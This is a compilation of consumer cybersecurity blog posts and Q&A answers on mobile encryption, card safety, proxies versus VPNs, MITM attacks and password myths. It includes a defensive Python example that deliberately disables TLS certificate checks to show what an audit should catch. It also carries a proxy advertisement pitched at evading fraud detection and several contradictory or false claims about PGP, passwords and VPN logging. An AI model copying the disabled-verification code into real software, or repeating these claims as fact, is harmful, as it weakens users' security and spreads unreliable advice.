

From photos of cherished memories to sensitive work documents, mobile devices hold an immense amount of information about us—our finances, locations, communications, and even our identity.
However, with this unparalleled convenience comes significant responsibility. Cybersecurity threats targeting mobile users grow more sophisticated every day, putting our data and privacy at risk. Whether you’re a casual smartphone user, a tech enthusiast who thrives on the latest innovations, or a business professional guarding critical corporate data, understanding how mobile devices protect your information is crucial.
Follow this guide to learn the most impressive ways mobile devices keep your data safe. The more you know about this mobile tech, the easier it will be to leverage it daily.
Encryption and Encouraging Safe Browsing
Encryption is at the heart of mobile data security. Modern mobile devices ensure that your personal information remains unreadable should it fall into the wrong hands. Data encryption works by converting your files, messages, and account details into a complex code that is only decipherable by authorized devices.
End-to-end encryption on messaging apps makes intercepted conversations indecipherable, setting a new standard for secure communication. Knowing about encryption on mobile devices is critical because some phones come with it, but not all of them will. Thankfully, many apps use encryption, so you can still leverage it to your advantage, even if your phone doesn’t come with encryption options out of the box.
Alongside encryption, secure connections play a significant role in protecting your data. From virtual private networks (VPNs) to secure HTTPS browsing, mobile devices encourage safer internet practices in many ways.
Biometric Systems for Personal Security
Biometric authentication has revolutionized how we access our phones. Facial recognition, fingerprint scanning, and even iris detection work seamlessly to ensure only you can unlock your device. Unlike passwords, which can be easily guessed or stolen, biometric data is uniquely tied to you, minimizing the risk of unauthorized access.
Evaluating this technology is a must because the role of biometric security in mobile devices is immense. For example, a widely used identity verification method on mobile devices is fingerprint scanning, which makes sign-ins easier without sacrificing quality security. With ongoing advancements in biometric technology, mobile devices are poised to provide an unparalleled combination of security and ease of use, reinforcing their role as indispensable tools in safeguarding your digital life.
Staying Ahead With Smart Practices
Technology plays its part in safeguarding your information, but human habits are equally critical. A high-quality phone is always built with a reliable operating system. That said, such systems run the risk of becoming outdated. The same principle applies to mobile apps. Thankfully, one of the most impressive ways that mobile devices keep your data safe is by relying on software and hardware that can receive updates.
Regularly updating your device’s operating system and apps ensures you have the latest security patches designed to counter evolving threats. Hackers can easily exploit outdated software to gain access to confidential data.
Use your new knowledge of mobile security to navigate the digital landscape with less worry and more excitement, knowing you have many tools on hand to keep your information safe.
4 Ways Refurbished Laptops Can Strengthen Your Cyber Defense


Cyber threats are becoming more sophisticated every day, with malware, phishing, and data breaches posing challenges. Establishing strong cyber defenses doesn’t always mean investing in costly, brand-new hardware, getting rid of outdated tech, or contributing to E-waste. Refurbished laptops can strengthen your cyber defense while providing a practical and budget-conscious alternative.
Pre-Installed Updated Operating Systems
Many refurbished laptops have up-to-date operating systems. These installations guarantee the inclusion of the latest security patches, which offer protection against known exploits.
Tech refurbishers must guarantee that the devices they resell are secure and functional, so they have to keep operating systems up to date.
They streamline the update process and reduce the complexity to guarantee even not-so-tech-savvy users can benefit from the latest security features. Owning a refurbished laptop doesn’t compromise security but rather enhances it with updated software.
Data Wipe Guarantees Boost Privacy
Reputable refurbishers employ rigorous data-wiping processes to eliminate any trace of the previous user’s information. This not only protects your privacy but also removes lingering vulnerabilities or malware.
Starting with a clean slate reduces exposure to potential threats and paves the way for secure usage. Paired with digital decluttering pointers, a wiped refurbished laptop promises peace of mind for users.
Data wiping involves deleting user files and utilizing advanced methods, such as drive reformatting and secure deletion algorithms, to ensure people can’t recover residual data. By choosing a refurbished laptop that has been wiped, users gain an enhanced sense of security and reduce the risk of unauthorized data access or recovery.
Removal of Bloatware Improves System Security
Bloatware, pre-installed software common on new laptops, can open unintentional backdoors for cybercriminals. Refurbished laptops, on the other hand, are typically stripped of unnecessary programs and come with streamlined systems.
This minimalist setup limits your device’s attack surface and reduces the risks posed by outdated or unsupported software.
Hardware Customization for Added Protection
One of the advantages of refurbished laptops is the ability to customize them to meet your security needs. These devices offer flexibility for enhanced defense, whether upgrading to an encrypted hard drive, adding endpoint protection software, or integrating a VPN.
Another important aspect of hardware customization for refurbished laptops is the option to configure network security features. Installing advanced firewalls and network monitoring tools can bolster your defenses against unauthorized access and intrusions.
Using intrusion detection systems (IDS) or intrusion prevention systems (IPS) can provide real-time alerts and automatic responses to potential threats. This proactive approach to network security guarantees your refurbished laptop is secure from digital threats.
Refurbished laptops can strengthen your cyber defense through software and hardware updates. Combined, these features make pre-loved devices a savvy choice for anyone prioritizing tech on a budget.
3 Benefits of Using Encrypted Cell Phones


In a world where our smartphones are essentially an extension of our selves, privacy and security have never been more important. With every text, call, and email we send, our personal and professional lives are increasingly intertwined on our digital devices.
This is where encrypted cell phones enter the stage, offering an essential layer of protection for anyone who values their privacy. Learn more about the benefits of using an encrypted cell phone, and find new ways to keep personal information safe today.
Securing Data Access
The only people who see your personal data should be you and the individuals or companies you allow access to it. Unfortunately, hackers and scammers are constantly trying to infiltrate personal devices to access people’s data.
Encryption converts your data into a code, preventing unauthorized access. When you send a message from an encrypted phone, it transforms into a jumbled set of characters that only the intended recipient can decipher. This ensures that, even if someone intercepts your message, they won’t be able to read it.
Encryption works through complex algorithms that require a unique key for decryption. Think of it as a digital lock and key. Only those with the correct key can unlock and read the data. This technology is crucial in protecting sensitive information from prying eyes, making encrypted cell phones a robust tool in maintaining privacy and security in our digital age.
Browsing With Peace of Mind
As mentioned above, one of the most significant benefits of encrypted devices is enhanced privacy and security, leading to a less stressful mobile experience. Encrypted phones ensure that your personal and professional information remains confidential, providing peace of mind in an increasingly interconnected world.
This doesn’t just keep data secure—it eases anxiety throughout the day. After all, hackers can try to infiltrate data in many ways. For example, browsing the web on an unencrypted device exposes you to the dangers of using public Wi-Fi. Public Wi-Fi can be an easy way for hackers to intercept your data, but secure encryption stops such attacks.
Preserving Trust & Security
As an everyday cell phone user, you should trust your device to handle your data responsibly. Moreover, business owners and their employees must keep sensitive data secure to preserve the trust between them and clients or customers.
Business owners stand to gain immensely from using encrypted cell phones. In today’s competitive landscape, safeguarding sensitive information such as client details, financial records, and proprietary data is crucial. Encrypted phones provide the necessary security to protect this information, helping businesses maintain trust and credibility with their clients.
Privacy advocates and those in high-risk professions, such as journalists, activists, and government officials, have a particular need for encrypted cell phones. These individuals often handle sensitive information that, if compromised, could have serious consequences. Encrypted phones provide a secure means to communicate and store data, allowing these professionals to carry out their work without fear of nefarious surveillance or data breaches.
The advantages of using encrypted cell phones are substantial. Empower your digital safety with an encrypted cell phone today.
Top 10 tips to protect your debit or credit card from being hacked?


Protecting your debit card or credit cards from being hacked can be daunting. However, following a few security and privacy best practices can ensure you don’t become the victim of cyberfraud. Keeping your PINs and security codes safe – and not sharing them with anyone – is the foundation for protecting your financial data from malicious hackers.
Upgrading to EMV-chip security on your credit cards offers an extra layer of protection against unauthorized access, while only making purchases on reliable websites that encrypt information helps minimize the risks posed by online shopping scams. Finally, tracking your card transactions regularly will alert you to any suspicious activity right away, allowing you to report it to your bank before further damage is done.
Here are some steps you can take to protect your debit card from being hacked:
- Use a strong and unique PIN: Avoid using easily guessable PINs such as your birthday or the last four digits of your phone number. Instead, use a long and complex PIN that is unique to your debit card.
- Avoid using your debit or credit card on public or unsecured WiFi networks: Hackers can easily intercept data transmitted over public WiFi networks, so it is best to avoid using your debit card on these networks. Avoid using public Wi-Fi networks to make online purchases or access sensitive information, as these networks are often unsecured and can be easily hacked. Instead, use a secure, encrypted network.
- Be cautious when entering your PIN: Cover the keypad with your hand when entering your PIN at an ATM or point-of-sale terminal to prevent anyone from seeing your PIN.
- Use a mobile payment service: Mobile payment services, such as Apple Pay or Google Pay, use a technology called “tokenization” to protect your card information. With tokenization, a unique code is generated for each transaction instead of using your actual card information.
- Monitor your account regularly: Keep an eye on your account activity and report any unauthorized transactions to your bank as soon as possible.
- Use a credit card instead of a debit card: Credit cards offer more protection against fraud than debit cards because you are not using your own money when you make a purchase. If your credit card is compromised, you can dispute the charges with your credit card company and the money will be returned to your account. With a debit card, the money is taken directly from your bank account and may be harder to recover.
- Use secure websites: When shopping online, make sure to only use secure websites that have “https” in the URL and a padlock symbol in the address bar. This indicates that the website is encrypted and your information will be protected.
- Use strong and unique passwords: Use strong, unique passwords for each of your online accounts and regularly change them to prevent them from being hacked. Avoid using easily guessable passwords, such as “123456” or your name.
- Enable two-factor authentication: Many online accounts offer two-factor authentication, which requires you to enter a code sent to your phone or email in addition to your password to log in. This adds an extra layer of security to your account.
- Monitor your accounts: Regularly check your bank and credit card statements to make sure there are no unauthorized charges. If you notice any suspicious activity, report it to your bank or credit card company immediately.
By following these steps, you can protect your debit or credit card from being hacked and reduce the risk of fraudulent charges.
To conclude:
When it comes to security and privacy, your debit or credit card should not be taken lightly. To protect against cyber security risks, it’s important to secure your PIN, avoid publicly sharing personal information, use trusted merchants for online purchases, update security features regularly, and stay abreast of emerging fraud safety practices. It never hurts to double check with your bank or credit provider for their recommendations on the latest security best practices. After all, when it comes to our financial security and safeguarding our cards from being hacked, an ounce of prevention is worth a pound of cure.
What strategies can be implemented by businesses to prevent cyber-fraud and protect customer data securely on digital platforms?
There are several strategies that businesses can implement to prevent cyber-fraud and protect customer data securely on digital platforms:
- Multi-factor authentication (MFA): Implementing MFA for login and access to sensitive data can help to prevent unauthorized access to customer data.
- Encryption: Encrypting sensitive data both in transit and at rest can help protect data in the event of a security breach.
- Network security: Implementing firewalls, intrusion detection and prevention systems, and other network security measures can help to prevent unauthorized access to customer data.
- Regular security assessments and audits: Regularly assessing and auditing the security of digital platforms can help identify vulnerabilities and implement corrective actions.
- Employee education and awareness: Training employees to recognize and prevent cyber-fraud, as well as creating a culture of security, can help prevent employee-related fraud.
- Network segmentation: Dividing the network into smaller networks can help to limit the damage that can be caused by a security breach.
- Access control: Proper access controls can help to prevent unauthorized access to customer data by limiting the number of employees who have access to sensitive data.
- Use security tools: Regularly scan for vulnerabilities, use antivirus and anti-malware tools, and use intrusion detection systems to detect and prevent cyber-attacks.
Overall, implementing a combination of these strategies can help businesses to prevent cyber-fraud and protect customer data securely on digital platforms. These measures should be regularly reviewed and updated in light of new threats and regulations.
What’s the difference between a proxy and a VPN and why is one security stronger than the other? Which security feature is stronger and why?


When it comes to online security, there are a number of different factors to consider. Two of the most popular methods for protecting your identity and data are proxy servers and VPNs. Both proxy servers and VPNs can help to mask your IP address and encrypt your traffic, but there are some key differences between the two. One major difference is that proxy servers only encrypt traffic going through the server, while VPNs encrypt all traffic from your device. This means that proxy servers are only effective if you’re using specific apps or visiting specific websites. VPNs, on the other hand, provide a more comprehensive solution as they can encrypt all traffic from your device, no matter where you’re accessing the internet from. Another key difference is that proxy servers tend to be less expensive than VPNs, but they also offer less privacy and security. When it comes to online security, proxy servers and VPNs both have their pros and cons. It’s important to weigh these factors carefully before deciding which option is right for you.
A VPN (virtual private network) connects your incoming and outgoing traffic to another network.
A proxy just relays your internet traffic. To websites you visit, your IP appears to be that of the proxy server.
A VPN is a type of proxy for which all the communication between your computer and the proxy server is encrypted. With a VPN, no one snooping your internet connection (e.g., your ISP) can see what websites you are visiting or what you are doing there. Security is much better.
VPN PROS:
What is a Proxy Server?
A proxy server is a computer system that performs as an intermediary in the request made by users. This type of server helps prevent an attacker from attacking the network and serves as a tool used to create a firewall.
Etymologically, the word proxy means “a figure that can be used to represent the value of something”; in other words, a proxy server represents or acts on behalf of the user. The fundamental purpose of proxy servers is to safeguard the direct connection between internet users and resources.
All requests made by users to the internet go to the proxy server. The responses to those requests return to the proxy server for evaluation and then to the user. Proxy servers serve as an intermediary between the local network and the world wide web. Proxy servers are used for several reasons, such as to filter web content, to avert restrictions like parental blocks, to screen downloads and uploads, and to provide privacy when browsing the internet. The proxy server also protects the identity of the users.
There are different types of proxy servers, used according to the purpose of the requests made by clients and users. Proxies provide a valuable layer of security for your network and computers. They can be set up as web filters or firewalls, which can protect computers from threats such as malware or ransomware. This extra security is also significant when linked with a secured gateway or attached security products. This way, network administrators can filter traffic according to its level of safety or its consumption of network bandwidth.
Are Proxies and VPNs the same?
Proxies are not the same as VPNs. The only similarity between Proxies and VPNs is that they both connect you to the internet via an intermediary server. An online proxy forwards your traffic to its destination, while a VPN, on the other hand, encrypts all traffic between the VPN server and your device. Here are some more differences between proxies and VPNs:
- VPNs help you encrypt your traffic while proxy servers don’t do that.
- Proxies don’t protect you from government surveillance, ISP tracking, and hackers, which is why they are never used to handle sensitive information. A VPN protects you from all of these.
- VPNs function on the operating system level while proxies work on the application level.
- Proxies only reroute the traffic of a specific app or browser while VPNs reroute it through a VPN server.
- Since VPNs need to encrypt your sensitive data, they can be slower than proxies.
- Most proxy servers are free while most VPNs are paid. Don’t trust free VPN services as they can compromise your data.
- A VPN connection is found to be more reliable than proxy server connections that can drop more frequently.
Why Is a VPN Considered to be More Secure Than a Proxy Server?
By now, you might have already noticed the reason since we have discussed it. The question is: Is a VPN better than a proxy? The simple answer is “Yes.”
How? A VPN provides privacy and security by routing your traffic through a secure VPN server and encrypting your traffic while a proxy, on the other hand, simply passes that traffic through a mediating server. It doesn’t necessarily offer any extra protection unless you use some extra features.
Proxy PROS:
However, when the motivation is to avoid geo-blocking, a proxy is more likely to be successful. Websites that need to do geo-blocking can normally tell that your IP is that of a VPN server. They don’t account for all the possible proxy servers.
But the problem here is they use datacenter IP (the server IP),
Also VPNs save logs and save EVERYTHING you do.
On the other hand, there are many types of proxy: datacenter proxy (worst one), residential proxy, mobile proxy 4G, and mobile proxy 5G.
If you use a residential proxy or mobile proxy, it might be much better and safer for many reasons:
- Residential IP means that the proxy uses a regular ISP like Comcast, Charter, Sprint, etc.
- They don’t save logs.
- The connection is not even direct; it goes to their server first and then to a real device in another place.
- Websites like Facebook and shopping sites won’t block you, because you use a residential or mobile proxy, so they won’t know that you use a proxy to hide your real IP, while a VPN will be easily detected.
Now people would say that the problem with socks5 residential and mobile proxies is the cost, because most websites sell them at a very expensive price.
I use a good, cheap and very high-quality socks5 residential proxy that costs only 3 USD a month per dedicated residential proxy, and the traffic is unlimited.
And it is very fast because it is dedicated and also virgin with fraud score 0.
The website name is Liber8Proxy.com
Moreover, socks5 residential proxy uses socks5 connection port with promixitron so it would cover your entire PC traffic.
Also, their customer support is nice and they are always online.
Source: https://qr.ae/pvWauF
How to Protect Yourself from Man-in-the-Middle Attacks: Tips for Safer Communication


Man-in-the-middle (MITM) attacks are a type of cyberattack where a malicious actor intercepts communications between two parties in order to secretly access sensitive data or inject false information. While MITM attacks can be difficult to detect, there are some steps you can take to protect yourself.
For example, always verify the identity of the person you’re communicating with and use encrypted communication tools whenever possible. Additionally, it’s important to be aware of common signs that an attack may be happening, such as unexpected messages or requests for sensitive information.
Man-in-the-middle attacks are one of the most common types of cyberattacks. MITM attacks can allow the attacker to gain access to sensitive information, such as passwords or financial data. Man-in-the-middle attacks can be very difficult to detect, but there are some steps you can take to protect yourself. First, be aware of the warning signs of a man-in-the-middle attack. These include:
- unexpected changes in login pages,
- unexpected requests for personal information,
- and unusual account activity.
If you see any of these warning signs, do not enter any sensitive information and contact the company or individual involved immediately. Second, use strong security measures, such as two-factor authentication, to protect your accounts. This will make it more difficult for attackers to gain access to your information. Finally, keep your software and operating system up to date with the latest security patches. This will help to close any potential vulnerabilities that could be exploited by attackers.
Man-in-the-middle attacks can be devastating for individuals and businesses alike. By intercepting communications between two parties, attackers can gain access to sensitive information or even impersonate one of the parties involved. Fortunately, there are a number of steps you can take to protect yourself from man-in-the-middle attacks.
- First, avoid using public Wi-Fi networks for sensitive transactions. Attackers can easily set up their own rogue networks, and it can be difficult to tell the difference between a legitimate network and a malicious one. If you must use public Wi-Fi, be sure to use a VPN to encrypt your traffic.
- Second, be cautious about the links you click on. When in doubt, hover over a link to see where it will actually take you. And always be suspicious of links that come from untrustworthy sources.
- Finally, keep your software and security tools up to date. Man-in-the-middle attacks are constantly evolving, so it’s important to have the latest defenses in place.
By following these simple tips, you can help keep yourself safe from man-in-the-middle attacks.
Is MITM attack possible when on HTTPS?
HTTPS (or really, SSL) is specifically designed to thwart MITM attacks.
Web browsers validate both that the certificate presented by the server is labeled correctly with the website’s domain name and that it has a chain of trust back to a well-known certificate authority. Under normal circumstances, this is enough to prevent anyone from impersonating the website.
As the question points out, you can thwart this by somehow acquiring the secret key for the existing website’s certificate.
You can also launch a MITM attack by getting one of the well-known certificate authorities to issue you a certificate with the domain name of the website you wish to impersonate. This can be (and has been) accomplished by social engineering and hacking into the registrars.
Outside of those two main methods, you would have to rely upon bugs in the SSL protocol or its implementations (of which a few have been discovered over the years).
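The two checks described in the answer above (the certificate is labeled with the requested domain name, and the client insists on a chain of trust), sketched with Python's standard `ssl` module as an added example that is not part of the original answer. The certificate dict and host names are constructed, and consulting only `subjectAltName` is an assumption of this sketch.

```python
import ipaddress
import ssl

# Constructed sample, shaped like the dict returned by SSLSocket.getpeercert().
SAMPLE_CERT = {
    "subject": ((("commonName", "shop.example"),),),
    "subjectAltName": (
        ("DNS", "shop.example"),
        ("DNS", "*.shop.example"),
        ("IP Address", "192.0.2.10"),
    ),
}


def dns_name_matches(pattern: str, hostname: str) -> bool:
    """Match one certificate DNS name against a hostname (RFC 6125 style).

    A wildcard is accepted only as the whole left-most label and stands for
    exactly one label: *.shop.example covers www.shop.example, but not
    shop.example and not a.b.shop.example.
    """
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    p_labels = pattern.split(".")
    h_labels = hostname.split(".")
    if len(p_labels) != len(h_labels) or "" in h_labels:
        return False
    if "*" in pattern:
        return (
            p_labels[0] == "*"
            and pattern.count("*") == 1
            and len(p_labels) >= 3          # never honour "*.com"
            and p_labels[1:] == h_labels[1:]
        )
    return p_labels == h_labels


def cert_covers_host(cert: dict, hostname: str) -> bool:
    """True if the certificate's subjectAltName entries cover hostname.

    Only subjectAltName is consulted (assumption of this example); the
    legacy commonName fallback is ignored.
    """
    sans = cert.get("subjectAltName", ())
    try:
        ip = ipaddress.ip_address(hostname)
    except ValueError:
        ip = None
    if ip is not None:
        # IP literals must match an IP entry exactly, never a DNS entry.
        return any(kind == "IP Address" and ipaddress.ip_address(value) == ip
                   for kind, value in sans)
    return any(kind == "DNS" and dns_name_matches(value, hostname)
               for kind, value in sans)


def audit_context(ctx: ssl.SSLContext) -> list:
    """List which of the two checks a client-side TLS context has switched off."""
    problems = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        problems.append("chain of trust not enforced (verify_mode is not CERT_REQUIRED)")
    if not ctx.check_hostname:
        problems.append("certificate name not checked (check_hostname is False)")
    return problems


def strict_context() -> ssl.SSLContext:
    """Default client context: chain validation and hostname check both on."""
    return ssl.create_default_context()


def weakened_context() -> ssl.SSLContext:
    """The misconfiguration to look for in client code: both checks disabled."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False      # has to be cleared before verify_mode can be relaxed
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


if __name__ == "__main__":
    for host in ("shop.example", "www.shop.example", "a.b.shop.example",
                 "shop.example.evil.test", "192.0.2.10"):
        print(f"{host:26} covered: {cert_covers_host(SAMPLE_CERT, host)}")
    print("strict  :", audit_context(strict_context()) or "both checks enforced")
    print("weakened:", audit_context(weakened_context()))
```

A client built on the weakened context accepts any certificate, which removes exactly the protection the answer describes; the audit function is the kind of check to run over code or configuration during review.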
What are the countermeasures of MITM?
1- Certificates.
For the web, we use a similar principle. A certificate is a specific document issued by a third party that validates the identity of a website. Your PC can ask the third party if the certificate is correct, and allows the traffic only if it is. This is what HTTPS does.
2- Simple…encryption!
Man-in-the-middle attacks work because an attacker sits between the two communicating parties (say, two clients, or a client and a server). If he is able to see the communication in clear text, he can do a whole lot, ranging from stealing login credentials to snooping on conversations. If encryption is implemented, the attacker sees unintelligible gibberish instead.
In terms of web communication, digital certificates do a great job of encrypting the communication stream (any website using HTTPS encrypts the communication stream by default). For social media apps like WhatsApp and Skype, it is the responsibility of the vendor to implement encryption.
MitM Attack Techniques and Types
- ARP Cache Poisoning. Address Resolution Protocol (ARP) is a low-level process that translates the machine address (MAC) to the IP address on the local network. …
- DNS Cache Poisoning. …
- Wi-Fi Eavesdropping. …
- Session Hijacking.
- IP Spoofing
- DNS Spoofing
- HTTPS Spoofing
- SSL Hijacking
- Email Hijacking
- Wifi Eavesdropping
- Cookie Stealing and so on.
Can MITM attacks steal credit card information?
When you enter your sensitive information on an HTTP website and press that “Send” button, all your private details travel in plain text from your web browser to the destination server.
A cyber-attacker can employ a man-in-the-middle attack and intercept your information. Since it’s not encrypted, the hacker can see everything: your name, physical address, card numbers, and anything else you entered.
To avoid MITM attacks, don’t share your info on HTTP sites. More on SSL certificates and man-in-the-middle attacks in this detailed Medium article.
How common are MITM attacks in public places with free WIFI?
Not commonly done by people, but commonly done by malware and other software designed for that purpose.
How do you ensure your RDP is secure from MITM attacks?
- Make sure all of your workstations and remote servers are patched.
- On highly sensitive devices, use two-factor authentication.
- Reduce the number of remote account users with elevated privileges on the server.
- Make a safe password.
- Your credentials should not be saved in your RDP register.
- Remove the RDP file from your computer.
How do we know that the Top 3 Voice Recognition Devices like Siri Alexa and Ok Google are not spying on us?


When you ask Siri a question, she gives you an answer. But have you ever stopped to wonder how she knows the answer? After all, she’s just a computer program, right? Well, actually, Siri is powered by artificial intelligence (AI) and Machine Learning (ML). This means that she is constantly learning and getting better at understanding human speech. So when you ask her a question, she uses her ML algorithms to figure out what you’re saying and then provides you with an answer.
So, How do we know that the Top 3 Voice Recognition Devices like Siri Alexa and Ok Google are not spying on us?
The Amazon Echo is a voice-activated speaker powered by Amazon’s AI assistant, Alexa. Echo uses far-field voice recognition to hear you from across the room, even while music is playing. Once it hears the wake word “Alexa,” it streams audio to the cloud, where the Alexa Voice Service turns the speech into text. Machine learning algorithms then analyze this text to try to understand what you want.
But what does this have to do with spying? Well, it turns out that ML can also be used to eavesdrop on people’s conversations. This is why many people are concerned about their privacy when using voice-activated assistants like Siri, Alexa, and Ok Google. However, there are a few things that you can do to protect your privacy. For example, you can disable voice recognition on your devices or only use them when you’re in a private location. You can also be careful about what information you share with voice-activated assistants. So while they may not be perfect, there are ways that you can minimize the risk of them spying on you.
Some applications which have background components, such as Facebook, do send ambient sounds to their data centers for processing. In so doing, they collect information on what you are talking about, and use it to target advertising.
Siri, Google, and Alexa only do this to decide whether or not you’ve invoked the activation trigger. For Apple hardware, recognition of “Siri, …” happens in hardware locally, without sending out data for recognition. The same for “Alexa, …” for Alexa hardware, and “Hey, Google, …” for Google hardware.
Things get more complicated for these three things, when they are installed cross-platform. So, for example, to make “Hey, Google, …” work on non-Google hardware, where it’s not possible to do the recognition locally, yes, it listens. But unlike Facebook, it’s not recording ambient to collect keywords.
Practically, it’s my understanding that the three major brands don’t, and it’s only things like Facebook which more or less “violate your trust” like this. And other than Facebook, I’m uncertain whether or not any other App does this.
You’ll find that most of the terms and conditions you’ve agreed to on installation of a third party App, grant them pretty broad discretion.
Personally, I tend to not install Apps like that, and use the WebUI from the mobile device browser instead.
If you do that, instead of installing an App, you rob them of their power to eavesdrop effectively. Source: Terry Lambert
Conclusion:
Machine learning is a field of artificial intelligence (AI) concerned with the design and development of algorithms that learn from data. Machine learning algorithms have been used for a variety of tasks, including voice recognition, image classification, and spam detection. In recent years, there has been growing concern about the use of machine learning for surveillance and spying. However, it is important to note that machine learning is not necessarily synonymous with spying. Machine learning algorithms can be used for good or ill, depending on how they are designed and deployed. When it comes to voice-activated assistants such as Siri, Alexa, and OK Google, the primary concern is privacy. These assistants are constantly listening for their wake words, which means they may be recording private conversations without the user’s knowledge or consent. While it is possible that these recordings could be used for nefarious purposes, it is also important to remember that machine learning algorithms are not perfect. There is always the possibility that recordings could be misclassified or misinterpreted. As such, it is important to weigh the risks and benefits of using voice-activated assistants before making a decision about whether or not to use them.
CyberSecurity – What are some things that get a bad rap, but are actually quite secure?


Cybersecurity is an important issue for everyone, from individuals to large organizations. There are many things that get a bad rap when it comes to cybersecurity, but that doesn’t mean they’re not secure. For example, PGP (Pretty Good Privacy) is a method of encrypting emails that is considered to be very secure. However, it can be difficult to set up and use. Another example is using very long passwords that are actually a sentence. This may seem like a security risk, but it’s actually more secure than a shorter password because it’s more difficult for hackers to guess. Additionally, changing the default port for certain services like databases can help to prevent hacking. Unplugging the ethernet cable may also seem like a security risk, but it’s actually one of the most effective ways to prevent data breaches. Finally, browser password managers are often considered to be insecure, but they’re actually quite secure if used properly. Cybersecurity is an important issue, and there are many things that can be done to help prevent hacking and data breaches.
There are a lot of CyberSecurity myths out there. People think that X, Y, and Z are the most secure way to do things when in reality, they are the least secure. The biggest myth is that PGP is unbreakable. PGP has been broken many times and is not a reliable form of CyberSecurity. Another myth is that very long passwords are secure. The problem with very long passwords is that they are difficult to remember and often get written down somewhere. If a hacker gets ahold of your password, they can easily access your account. The best way to prevent CyberSecurity breaches is to use MFA, OAuth, and two-step verification whenever possible. These methods make it much more difficult for hackers to gain access to your accounts. While they may not be foolproof, they are the best CyberSecurity measure available.
1- PGP
PGP is a Form of Minimalism
As a protocol, PGP is surprisingly simple. Here is what happens if you want to use it to securely send a message to someone:
- You get from them a PGP identity (public key). How you do that is entirely up to you.
- Your PGP program uses that identity to perform a single public key encryption of a message key.
- Then the message key is used to encrypt the message which is added to the encrypted message key to make the encrypted message.
- Your correspondent does the opposite operations to get the message.
If you want to sign your message then you:
- Hash the message.
- Do a public key signature operation on the hash and attach the result to the message.
- Your correspondent checks the signature from your PGP identity, which they have acquired somehow.
The simple key handling is where the minimalism comes from. It is why PGP can be used in so many non-email contexts.
As a contrast, consider the Signal Protocol for instant messaging. I will not attempt to describe Signal in any detail as I would get parts of it wrong. It would also make for a pointlessly long article. There is a high level description of the Signal protocol here. None of the following comments are intended to be critical, they are intended to give an idea of the level of complexity of the protocol in total:
- Signal has at least 2 systems for creating forward secrecy. Each system requires a system to deal with loss of synchronization.
- A Signal session requires the storage and maintenance of a lot of state information.
- Signal normally uses a server based “prekey” system to deal with the case where a client is offline and thus is unable to negotiate.
- Signal achieves partial deniability with a triple Diffie-Hellman key exchange. OpenPGP achieves complete deniability by not signing the message in the first place.
- Supporting the Signal protocol in practice requires a separate system to store and protect past messages. Since this is at odds with forward secrecy such a system will end up with a system to delete old messages.
The Signal Protocol is built on ideas from the Off the Record (OTR) protocol. Interestingly enough, OTR was intended to improve PGP by adding extra functionality. Signal adds functionality on top of the OTR functionality. So Signal could be considered the result of an attempt to improve something by making it more complex.
I believe that reliability and security are best achieved with simple systems. OpenPGP is a standard that describes such a system.
2- Very long passwords that are actually a sentence
It could be bad if you just came up with it and forget it, and people think it’s bad if it only has lowercase and no numbers or punctuation. But a 5-6 word sentence could be quite secure, especially if it’s a bit weird. “Lemons make a delicious snack in my house.”
3- Writing passwords down.
I tell all my old relatives to write their passwords down in a little notebook. As long as there isn’t someone there regularly I don’t trust, it is much better than using same password and if their physical security at their house is compromised, there are bigger concerns than a notebook of banking passwords.
We write down all the passwords to our most secure systems – but then we rip them in half and put them in 2 separate safes.
Did I say passwords? I meant encryption keys.
4- Changing default ports for certain services like dbs
Most of the gangs out there use tools that don’t do a full search, so they go through the default port list
5- MFA in general.
Takes 60 seconds to set up, and an additional 5s each time you use it, but can save you hours if not days of manual recovery efforts with support to regain access to a compromised account. Yet people don’t like the idea.
If you are using TOTP for your MFA, you can even put it right in the browser with a plug-in. I use this approach for work. It’s very convenient.
If you use a password manager that supports TOTP and auto type (e.g. KeePassXC) then you don’t even need to mess with it once you have it set up.
6- OAuth for 3rd party apps.
Those “sign into our app with your (Google, Microsoft, etc) account” things. As long as you trust the ID provider and the app, it’s usually secure. More so, considering it prevents password reuse, and you aren’t exposed if any of those 3rd party apps have a breach.
7- Two-step verification.
Yes it’s annoying to need two devices every time you want to log into your most precious accounts, but trust me, I’d rather take the extra 10 seconds to authorize a login than go through the hell of having my account breached.
8- Biometric Authentication.
The argument is that ‘you can’t change your face/finger’ but it is actually more secure than other ‘magic link’ providers.
Let me be clear, there are some providers that are still iffy on security. But there are also some that have device native authentication (you need the device to auth), they don’t store passwords or password hashes, and only have public keys.
One example of this is https://passage.id/ which is about as secure as you can get.
9- Zoom.
Yes, they had a bunch of issues at the start, but they fixed them. I would much rather work with a company that had security assessments and fixed the problems rather than a company which has never been assessed.
10- Unplugging the ethernet cable.
11- Browser password managers?
Rant moment: reasons cybersecurity fails
<Rant>
People don’t see value of putting effort in cybersecurity because they don’t see any material gains from it. The best thing they can see is nothing bad happening.
No news isn’t good enough of a good news. This is enough to mostly ignore all cybersecurity advice altogether.
This is similar to people not taking care of themselves health-wise, because the best things they can see is not getting sick.
</Rant>
Why do cyber attackers commonly use social engineering attacks?
Hackers commonly use social engineering attacks because they can be very effective. By using social engineering, hackers can take advantage of people’s trusting nature and willingness to help others. They can also exploit the fact that people are often not well-informed about security and privacy issues. For example, a hacker might pose as a customer service representative and ask for someone’s password. Or, they might send an email that looks like it is from a trusted source, such as a bank or government agency, and ask the recipient to click on a link or download an attachment. If the person falls for the deception, the hacker can gain access to their accounts or infect their computer with malware. That is why it is important to be aware of these types of attacks and know how to protect yourself.
Cyber attackers commonly use social engineering attacks for a number of reasons. First, hacking into a person’s or organization’s computer systems is becoming increasingly difficult as security measures become more sophisticated. Second, even if a hacker is able to gain access to a system, they are likely to be discovered and caught before they can do any significant damage. Third, social engineering attacks allow hackers to bypass security measures and obtain sensitive information without being detected. Finally, social media platforms have made it easier for cyber attackers to obtain personal information about their targets and to carry out attacks. As a result, social engineering attacks are an attractive option for many cyber attackers.
To conclude:
